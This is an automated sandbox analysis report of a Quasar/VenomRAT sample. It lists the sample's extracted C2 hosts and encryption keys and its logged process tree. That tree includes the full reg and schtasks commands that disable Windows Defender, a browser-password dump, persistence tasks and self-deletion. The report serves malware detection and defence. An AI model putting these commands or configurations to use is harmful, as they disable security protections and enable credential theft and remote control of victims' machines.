Analysis
-
max time kernel
148s -
max time network
168s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
10/03/2022, 18:45
General
-
Target
50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
-
Size
6.2MB
-
MD5
942b78bcd8a5aa6d10436832b1260671
-
SHA1
e35e87e58f94e304dd0b97e9b85c6cb30146978d
-
SHA256
50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90
-
SHA512
89baba3a305d1d6969b68e4f63c294a861fc755f65ac6d0f5a67f7d6b7aa26cd852f78ce0441af489a70991a9cd0887388687d89efd0f1fb95fb316490d030e3
Score
10/10
Malware Config
Extracted
Family
quasar
Version
2.1.0.0
Botnet
Windows Security Notification
C2
minecraftgaming009-61323.portmap.io:61323
Mutex
VNM_MUTEX_c2q7y2ayYutZ2XaYe7
Attributes
-
encryption_key
1oSvdU99XhcwnNYl3rB8
-
install_name
Windows Security Notification.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Security Notification
-
subdirectory
SubDir
Extracted
Family
quasar
Version
1.4.0.0
Botnet
Steam
C2
Minecrafthosting6969-35389.portmap.io:35389
Mutex
EAojkiVMQ0sDtyACyi
Attributes
-
encryption_key
P5xHRD8P5ncR2T1uRpgp
-
install_name
Steam.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Steam
-
subdirectory
SubDir
Signatures
-
Contains code to disable Windows Defender 13 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies security service 2 TTPs 1 IoCs
-
Quasar Payload 14 IoCs
-
Quasar RAT 4 IoCs
Quasar is an open source Remote Access Tool.
-
VenomRAT
VenomRAT is a modified version of QuasarRAT with some added features, such as rootkit and stealer capabilites.
-
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
-
Nirsoft 6 IoCs
-
Executes dropped EXE 11 IoCs
-
Deletes itself 1 IoCs
-
Drops startup file 2 IoCs
-
Loads dropped DLL 12 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe"C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe"1⤵
- Quasar RAT
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe"C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Knfk.exe"C:\Users\Admin\AppData\Local\Temp\Knfk.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4EpeebWszwq3L5jgvisNmyvGbyVAfjjb/WhkVRHM1jSY9bDQBPQUlA+KOt+q65oQzJt9yxASNarn9KPWpl7VpeJNaoB2sh/pMWGpfd1hNghc5haR0kkZkRiX8yULrHRxs=3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.exeC:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeC:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe"C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 10883⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe"C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe"C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\uplqX772QRKw.bat" "4⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 15124⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\Admin\AppData\Local\Temp\*4⤵
- Deletes itself
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
3.0MB
-
Filesize
3.0MB
-
Filesize
6.9MB
-
Filesize
6.2MB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
424KB
-
Filesize
144KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
600KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
600KB
-
Filesize
6.9MB
-
Filesize
144KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
3.7MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
68KB
-
Filesize
192KB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
3.3MB
-
Filesize
24KB
-
Filesize
8KB
-
Filesize
704KB
-
Filesize
9.9MB
-
Filesize
648KB
-
Filesize
200KB
-
Filesize
104KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
8KB